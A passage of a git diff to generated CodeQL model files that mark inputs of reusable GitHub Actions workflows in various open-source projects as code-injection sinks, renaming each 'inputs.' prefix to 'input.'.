a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "inputs.mage-targets", "code-injection", "generated"] - - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "inputs.dev-engine", "code-injection", "generated"] \ No newline at end of file + - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.mage-targets", "code-injection", "generated"] + - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.dev-engine", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml index c02368b5d51..f5ce50243f7 100644 --- a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "inputs.deploy_path", "code-injection", "generated"] - - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "inputs.envname", "code-injection", "generated"] \ No newline at end of file + - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.deploy_path", "code-injection", "generated"] + - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.envname", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml index 61b3e84b29e..58c30f3cd02 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["datadog/dd-trace-go/.github/workflows/smoke-tests.yml", "*", "inputs.go-libddwaf-ref", "code-injection", "generated"] \ No newline at end of file + - ["datadog/dd-trace-go/.github/workflows/smoke-tests.yml", "*", "input.go-libddwaf-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml index 72e4a3eec65..d6c0ced50a6 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["datadog/dd-trace-py/.github/workflows/lib-inject-publish.yml", "*", "inputs.ddtrace-version", "code-injection", "generated"] - - ["datadog/dd-trace-py/.github/workflows/build-and-publish-image.yml", "*", "inputs.context", "code-injection", "generated"] \ No newline at end of file + - ["datadog/dd-trace-py/.github/workflows/lib-inject-publish.yml", "*", "input.ddtrace-version", "code-injection", "generated"] + - ["datadog/dd-trace-py/.github/workflows/build-and-publish-image.yml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml index 5e875442771..fdcb8775dad 100644 --- a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "inputs.run_id", "code-injection", "generated"] - - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "inputs.source_id", "code-injection", "generated"] \ No newline at end of file + - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.run_id", "code-injection", "generated"] + - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.source_id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml index 991743df7d2..66889d2cf42 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml @@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.s3_bucket_name", "code-injection", "generated"] - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.build_script_path", "code-injection", "generated"] - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.nightly_release", "code-injection", "generated"] - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.test_run", "code-injection", "generated"] - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.env_setup_script_path", "code-injection", "generated"] - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.target_branch", "code-injection", "generated"] - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.sha", "code-injection", "generated"] - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.package_test_command", "code-injection", "generated"] - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.version_number", "code-injection", "generated"] \ No newline at end of file + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.build_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.nightly_release", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.test_run", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.env_setup_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.target_branch", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.sha", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.package_test_command", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.version_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml index 780d95fab47..e5c5cfeabd3 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "inputs.nightly_release", "code-injection", "generated"] - - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "inputs.test_run", "code-injection", "generated"] - - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "inputs.target_branch", "code-injection", "generated"] - - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "inputs.version_number", "code-injection", "generated"] \ No newline at end of file + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.nightly_release", "code-injection", "generated"] + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.test_run", "code-injection", "generated"] + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.target_branch", "code-injection", "generated"] + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.version_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml index cf69379583d..4dc3fc2bc98 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml @@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.s3_bucket_name", "code-injection", "generated"] - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.build_script_path", "code-injection", "generated"] - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.nightly_release", "code-injection", "generated"] - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.test_run", "code-injection", "generated"] - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.env_setup_script_path", "code-injection", "generated"] - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.target_branch", "code-injection", "generated"] - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.sha", "code-injection", "generated"] - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.package_test_command", "code-injection", "generated"] - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.version_number", "code-injection", "generated"] \ No newline at end of file + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.build_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.nightly_release", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.test_run", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.env_setup_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.target_branch", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.sha", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.package_test_command", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.version_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml index 211fe546e28..52c4b4c7a24 100644 --- a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["decidim/decidim/.github/workflows/test_app.yml", "*", "inputs.test_command", "code-injection", "generated"] \ No newline at end of file + - ["decidim/decidim/.github/workflows/test_app.yml", "*", "input.test_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml index d59258ce992..038f92a5317 100644 --- a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["defectdojo/django-defectdojo/.github/workflows/release-x-manual-helm-chart.yml", "*", "inputs.release_number", "code-injection", "generated"] \ No newline at end of file + - ["defectdojo/django-defectdojo/.github/workflows/release-x-manual-helm-chart.yml", "*", "input.release_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml index 43f5349bf3c..6fab83acf59 100644 --- a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dependencytrack/dependency-track/.github/workflows/_meta-build.yaml", "*", "inputs.app-version", "code-injection", "generated"] \ No newline at end of file + - ["dependencytrack/dependency-track/.github/workflows/_meta-build.yaml", "*", "input.app-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml index d6ef60a9698..238856cc7b9 100644 --- a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["devexpress/testcafe/.github/workflows/test-server.yml", "*", "inputs.test-script", "code-injection", "generated"] - - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "inputs.test-script", "code-injection", "generated"] - - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "inputs.display", "code-injection", "generated"] - - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "inputs.matrix-jobs-count", "code-injection", "generated"] - - ["devexpress/testcafe/.github/workflows/test-client.yml", "*", "inputs.test-script", "code-injection", "generated"] \ No newline at end of file + - ["devexpress/testcafe/.github/workflows/test-server.yml", "*", "input.test-script", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "input.test-script", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "input.display", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "input.matrix-jobs-count", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-client.yml", "*", "input.test-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml index 1d41854bf71..71b584f5427 100644 --- a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml @@ -3,16 +3,16 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "inputs.artifact-name", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "inputs.append-date-and-hash", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.artifact-name", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.append-date-and-hash", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.common-files", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.xml-dump-type-sizes", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.tests", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.docs", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.extras", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.stonesense", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.platform-files", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.launchdf", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.gcc-ver", "code-injection", "generated"] \ No newline at end of file + - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.artifact-name", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.append-date-and-hash", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.artifact-name", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.append-date-and-hash", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.common-files", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.xml-dump-type-sizes", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.tests", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.docs", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.extras", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.stonesense", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.platform-files", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.launchdf", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.gcc-ver", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml index 9f64a59aead..1aa15482887 100644 --- a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "inputs.id", "code-injection", "generated"] - - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "inputs.type", "code-injection", "generated"] \ No newline at end of file + - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.id", "code-injection", "generated"] + - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml index 69cb39e5e55..89dd705f590 100644 --- a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dragonwell-project/dragonwell11/.github/workflows/test.yml", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file + - ["dragonwell-project/dragonwell11/.github/workflows/test.yml", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml index a66e2a2cca5..eb57c708bf5 100644 --- a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml @@ -3,20 +3,20 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.BINARY", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.SUDO", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.TARGET_NAME", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.EXTRA_ARGS", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.BUILT_EARTHLY_PATH", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-wait-block-main.yml", "*", "inputs.BINARY", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-wait-block-main.yml", "*", "inputs.SUDO", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.BINARY", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.SUDO", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.EXTRA_ARGS", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.BUILT_EARTHLY_PATH", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.TEST_TARGET", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.BINARY", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.SUDO", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.BINARY_COMPOSE", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.RUN_EARTHLY_TEST_ARGS", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.BUILT_EARTHLY_PATH", "code-injection", "generated"] \ No newline at end of file + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.TARGET_NAME", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.EXTRA_ARGS", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.BUILT_EARTHLY_PATH", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-main.yml", "*", "input.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-main.yml", "*", "input.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "input.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "input.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "input.EXTRA_ARGS", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "input.BUILT_EARTHLY_PATH", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "input.TEST_TARGET", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "input.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "input.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "input.BINARY_COMPOSE", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "input.RUN_EARTHLY_TEST_ARGS", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "input.BUILT_EARTHLY_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml index ca3eeca8df7..048a753c553 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["eclipse-vertx/vert.x/.github/workflows/ci.yml", "*", "inputs.profile", "code-injection", "generated"] \ No newline at end of file + - ["eclipse-vertx/vert.x/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml index b95ce03ed3a..739f6a546b2 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["eclipse-vertx/vertx-sql-client/.github/workflows/ci.yml", "*", "inputs.profile", "code-injection", "generated"] \ No newline at end of file + - ["eclipse-vertx/vertx-sql-client/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml index 326d4391ecb..f6c2769caaf 100644 --- a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["elastic/elasticsearch-net/.github/workflows/release.yml", "*", "inputs.solution", "code-injection", "generated"] \ No newline at end of file + - ["elastic/elasticsearch-net/.github/workflows/release.yml", "*", "input.solution", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml index 9f729879723..4d104c74c66 100644 --- a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml @@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["element-hq/element-desktop/.github/workflows/build_windows.yaml", "*", "inputs.version", "code-injection", "generated"] - - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "inputs.config", "code-injection", "generated"] - - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "inputs.version", "code-injection", "generated"] - - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "inputs.base-url", "code-injection", "generated"] - - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "inputs.version", "code-injection", "generated"] - - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "inputs.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_windows.yaml", "*", "input.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.config", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "input.base-url", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "input.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "input.version", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml index 835bbf4cf89..9f56abf2858 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "inputs.testTimeout", "code-injection", "generated"] - - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "inputs.count", "code-injection", "generated"] \ No newline at end of file + - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.testTimeout", "code-injection", "generated"] + - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.count", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml index 453c3cd06f3..8c73342d5fe 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["etcd-io/etcd/.github/workflows/tests-template.yaml", "*", "inputs.arch", "code-injection", "generated"] - - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "inputs.scenario", "code-injection", "generated"] - - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "inputs.testTimeout", "code-injection", "generated"] - - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "inputs.count", "code-injection", "generated"] \ No newline at end of file + - ["etcd-io/etcd/.github/workflows/tests-template.yaml", "*", "input.arch", "code-injection", "generated"] + - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "input.scenario", "code-injection", "generated"] + - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "input.testTimeout", "code-injection", "generated"] + - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "input.count", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml index 32e6124c06e..87253d88224 100644 --- a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml +++ 